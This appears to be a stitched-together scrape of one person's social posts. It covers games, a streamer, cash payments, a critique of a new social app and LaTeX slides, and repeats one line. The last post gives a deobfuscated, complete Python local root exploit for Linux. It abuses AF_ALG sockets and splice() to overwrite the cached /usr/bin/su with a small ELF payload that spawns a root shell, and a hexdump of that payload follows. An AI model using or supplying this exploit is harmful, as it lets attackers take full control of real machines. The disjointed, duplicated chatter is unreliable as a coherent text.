

you’d only need to change the payload part, which is a compiled x86 ELF header.


you’d only need to change the payload part, which is a compiled x86 ELF header.
“this is the one thing we didn’t want to happen”


unless apple is doing something weird, the init system is a program, not part of the kernel.
holy shit it’s marcus gearsowar!


that’s what made him big, sounding like he knew stuff


oh i’ve never watched anything directly by him except his animal well playthrough, where he spends a lot of time “thinking” by looking down at his desk


for me? i don’t really need anything done… why, is he available?


he’s basically disappeared from the internet entirely since then
oh for some reason i thought you meant like some sort of generic cash vouchers. i even have those mullvad scratch-offs myself. i’m a dumb.


shorting. they’re taking stuff because that will make the hotel less valuable, so they can make a profit.
not outside the us.
also you can pay their fee using cash in an envelope.
don’t send cash in the mail by the way.


banished is real good. it’s a medieval village sim. it’s also 6.50€ right now.
i see everyone recommending against the storm, banished is basically “what if that game was colorless, depressing and brutally realistic”.


the reason i’m super negative is that the blog post makes no sense. he’s overpaid massively for a domain because it used to have an old forum on it, and he is now announcing his intention to build a thing using that name which is nothing like it, to recapture a feeling of nostalgia for another app which is nothing like the first two. and he is marketing it as a way to meet new people despite he fact that you have to meet people before you can see them in the app.
this has amico written all over it.
like, how do you even reach critical mass if the barrier to entry is intentionally set 20 meters off the ground? why market yourself with an old forgotten name despite not resembling the old thing at all? why announce it before you have something to show?


if it’s federation-focused i’m out. make it with the same atmosphere as the iron lung film, though…


i use latex beamer templates for presentations. it’s hard to fuck up displaying a pdf. if you want you can use markdown -> pandoc -> tectonic to skip writing latex.
here’s my attempt at deobfuscating it:
#!/usr/bin/env python3 import os import zlib import socket as s def inject(file, offset, data): sock = s.socket(s.AF_ALG, s.SOCK_SEQPACKET) sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) sock.setsockopt(s.SOL_ALG, s.SO_DEBUG, bytes.fromhex("0800010000000010" + "0" * 64)) sock.setsockopt(s.SOL_ALG, s.SO_DONTROUTE, None, optlen=4) conn, _ = sock.accept() conn.sendmsg( [b"AAAA" + data], [ (s.SOL_ALG, s.MSG_OOB | s.MSG_PEEK, b"\x00\x00\x00\x00"), (s.SOL_ALG, s.MSG_PEEK, b"\x10" + b"\x00" * 19), (s.SOL_ALG, s.MSG_DONTROUTE, b"\x08\x00\x00\x00"), ], s.MSG_MORE, ) r, w = os.pipe() os.splice(file, w, offset + 4, offset_src=0) os.splice(r, conn.fileno(), offset + 4) try: conn.recv(8 + offset) except: pass binary = os.open("/usr/bin/su", 0) offset = 0 payload = zlib.decompress( bytes.fromhex( "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301" "d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96" "75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3" ) ) while offset < len(payload): inject(binary, offset, payload[offset : offset + 4]) offset += 4 os.system("su")as far as i understand the writeup, the weakness is in the
splice()function, because it silently crosses an auth boundary. the payload looks like this:00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ # ELF x86-64 v1, executable 00000010: 0200 3e00 0100 0000 7800 4000 0000 0000 ..>.....x.@..... 00000020: 4000 0000 0000 0000 0000 0000 0000 0000 @............... 00000030: 0000 0000 4000 3800 0100 0000 0000 0000 ....@.8......... # contains 1 56-bit program header 00000040: 0100 0000 0500 0000 0000 0000 0000 0000 ................ # program header starts 00000050: 0000 4000 0000 0000 0000 4000 0000 0000 ..@.......@..... 00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000 ................ # flags r-x 00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05 ........1.1..i.. # program starts 00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531 H.=....1.j;X...1 00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000 .j<X../bin/sh...it’s an ELF header that replaces the one on the cached version of the binary (su in this case).